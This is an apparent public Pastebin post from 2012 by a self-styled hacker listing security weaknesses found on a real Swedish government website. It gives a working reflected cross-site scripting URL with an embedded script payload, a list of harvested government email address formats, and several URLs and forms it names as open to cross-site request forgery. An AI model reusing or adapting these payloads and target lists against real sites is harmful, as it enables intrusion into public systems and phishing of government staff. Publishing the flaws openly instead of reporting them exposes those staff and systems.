API tools faq
paste
Advertisement
human_mind_cracker

report3:Sweden governement

human_mind_cracker
Oct 28th, 2012
159
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.71 KB | None | 0 0
raw download clone embed print report
  1. **********************************************************************************************
  2.  
  3. Target: http://www.government.se
  4.  
  5. [**] XSS:
  6.  
  7. http://www.government.se/pub/road/Classic/share/jsp/popup_tipOff.jsp?nocache=true&%3Cscript%3Ealert%28%22XSS%20vuln%20on%20Sweden%20Governement%20website%20found%20by%20Human%20Mind%20Cracker%22%29%3C/script%3E&l=en&d=%22%27%3CkapeV%3E
  8.  
  9. ********************** Work on mozzila ;)
  10.  
  11. [**] Email:
  12.  
  13. email: n.n@gov.se
  14.  
  15. email: firstname.lastname@gov.se
  16.  
  17. email: ministryname.registrator@gov.se
  18.  
  19. email: forvaltningsavdelningen.registrator@gov.se
  20.  
  21. email: pressrummet@foreign.ministry.se
  22.  
  23. email: n.n@regeringskansliet.se
  24.  
  25. email: fornamn.efternamn@regeringskansliet.se
  26.  
  27. email: departementsnamnet.registrator@regeringskansliet.se
  28.  
  29. [**]Cross-site Request Forgery
  30.  
  31. Cross-site Request Forgery (CSRF) is a type of attack whereby unauthorized commands are transmitted from a user that the application trusts. Unlike Cross-site Scripting (XSS), which exploits the trust a user has for a particular site, CSRF exploits the trust that a site has in a user's browser.
  32.  
  33. [-]solution: Url and Forms that perform important operations must be protected by random tokens (hidden nonce values). These tokens must be checked for validity at the server before the request is processed.
  34.  
  35. url: http://www.government.se/sb/d/573/a/12566
  36.  
  37. form: <form method="GET" action="http://www.government.se/sb/d/573/a/12566" enctype="application/x-www-form-urlencoded" autocomplete="on"> ... </form>
  38.  
  39. url: http://www.government.se/sb/d/8317/a/201245
  40.  
  41. form: <form method="POST" action="http://www.government.se/sb/d/8317/a/201245" enctype="application/x-www-form-urlencoded" autocomplete="on"> ... </form>
  42.  
  43. url: http://www.government.se/sb/d/16286/a/202392
  44.  
  45. form: <form method="POST" action="http://www.government.se/sb/d/16286/a/202392" enctype="application/x-www-form-urlencoded" autocomplete="on"> ... </form>
  46.  
  47. url: http://www.government.se/sb/d/15633/a/166579
  48.  
  49. form: <form method="POST" action="http://www.government.se/sb/d/15633/a/166579" enctype="application/x-www-form-urlencoded" autocomplete="on"> ... </form>
  50.  
  51. url: http://www.government.se/pub/road/Classic/share/jsp/popup_tipOff.jsp?d=10123&nocache=true&a=117559&l=en
  52.  
  53. form: <form method="POST" action="http://www.government.se/pub/road/Classic/share/jsp/popup_tipOff.jsp" enctype="application/x-www-form-urlencoded" autocomplete="on"> ... </form>
  54.  
  55. url: http://www.government.se/sb/d/574/action/browse/c/y2012
  56.  
  57. form: <form method="POST" action="http://www.government.se/sb/d/574" enctype="application/x-www-form-urlencoded" autocomplete="on"> ... </form>
  58.  
  59.  
  60.  
  61.  
  62. Picture : http://www.imagup.com/data/1166123868.html
  63.  
  64.  
  65. human mind cracker
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!